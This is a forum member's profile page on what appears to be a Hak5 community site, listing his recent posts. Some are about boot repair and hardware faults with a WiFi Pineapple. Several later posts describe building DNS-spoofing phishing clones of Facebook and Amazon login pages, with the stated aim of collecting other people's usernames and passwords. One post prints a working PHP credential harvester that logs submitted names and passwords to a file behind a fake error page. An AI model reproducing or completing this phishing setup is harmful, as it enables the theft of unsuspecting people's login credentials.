Jump to content

kdmcshane

Active Members
  • Content Count

    34
  • Joined

  • Last visited

About kdmcshane

  • Rank
    Hak5 Fan +
  • Birthday 07/26/1990

Profile Information

  • Gender
    Male
  • Location
    Sioux Falls

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Does anyone know what copy of Ubuntu I could torrent that would have boot-repair on it if I burned the download onto a CD?
  2. Thanks, Stz! I really appreciate the reply. ^_^
  3. I had Windows 7 & Backtrack installed and when I would turn my laptop on, it would have a dual boot ubuntu manager where I would select booting into Windows 7 or Backtrack. I deleted Windows 7 and reinstalled that operating system. I'm guessing that during the Windows 7 installation it "repaired" the "bootmgr." So now it just boots into Windows 7 without asking me if I want to boot into Backtrack. The parition for Backtrack is still intacted. I just have no way of booting into it now. Is there any possible way to fix the bootmgr back to the way it was without having to reinstall Backtra
  4. Also, how many volts does the power supply push out? I might be able to just go through my box of random power cords and see if I have something that will fit into the device but I want to make sure I'm using a power supply that's compatible.
  5. I searched the web all over and can't find any way to order a replacement power adapter for my Mark IV
  6. When I diagnose the "Local Area Connection" it says, "An Ethernet Cable is not properly plugged in or might be broken." Which makes no sense because the ethernet cord I'm using is completely intact.
  7. I don't know what happened. It was working perfectly fine this morning. Suddenly when I plug in my ethernet cord I received with the pineappe device when I purchased it, Windows 7 is reporting "Network Cable Unplugged." Some people say it may have had something to do with the pineapple not getting enough power but I don't see how that was possible considering it was plugged into a wall jack. I also uninstalled my ethernet driver on Windows 7 and reinstalled it and that didn't help either. The pineapple itself seems to be working perfectly fine when I connect to it via wifi. But it just
  8. I also noticed that some saved web pages work and some do. For example. A copy of gmail worked but it wouldn't load a copy of amazon.htm for some reason. My only guess is that the htm files are too large to be loaded?
  9. I attempted to follow these instructions exactly when saving other webpages such as "amazon" (sign in page) and I searched for the correct places to change by searching "tabindex" in Notepad++ For some reason, the pineapple would load my facebook.htm but not the amazon.htm? Are there certain sites you can't copy and load up in DNS spoofing or is it because the amazon.htm and files that come with it are too large?
  10. No. I didn't realize that right away but I fixed everything and I have everything working now. But there is one thing I want to do that I don't know how to do. Instead of the error.php file just sending someone to the white page saying 503 gateway error, how do I just have it redirect them to the real website?
  11. So I think I figured it out. For some reason by renaming my html files to "htm" instead, they were successful. I don't really understand why the pineapple wouldn't be able to pull up the html files too.
  12. Alright. Well, I guess I'll just keep troubleshooting this problem until someone offers to step in a throw a few helpful words to me.
  13. At one point, I was able to get something to load when I typed in facebook.com, but that actually just went to a page listing all the files I had in my www folder on the pineapple. I don't want to do this because I want to collect other people's usernames and passwords. Even if I got them, you couldn't use them because their account wouldn't recognize your device but I simply enjoy the fascination of seeing these things in work. I've tried a lot of other stuff on the pineapple but this is my first attempt trying to do DNS spoofing and or pineapple phishing purely for recreational curiosity an
  14. Here's a snapshot of my php files. error.php <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("bitches.txt", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><body> <h1>503 Service Unavailable</h1> </body&g
  15. I can't even express how many tutorials I've tried following to get this to work and its still not working. This is the most recent tutorial I tried doing. http://hak5.org/hack/pineapple-phishing I followed every little instruction on this tutorial and it still doesn't work. If someone that is pretty savy and could set this up easy within a short period of time could jump on teamviewer and take a look at what I did wrong and why its not working, I'd really appreciate that.
×
×
  • Create New...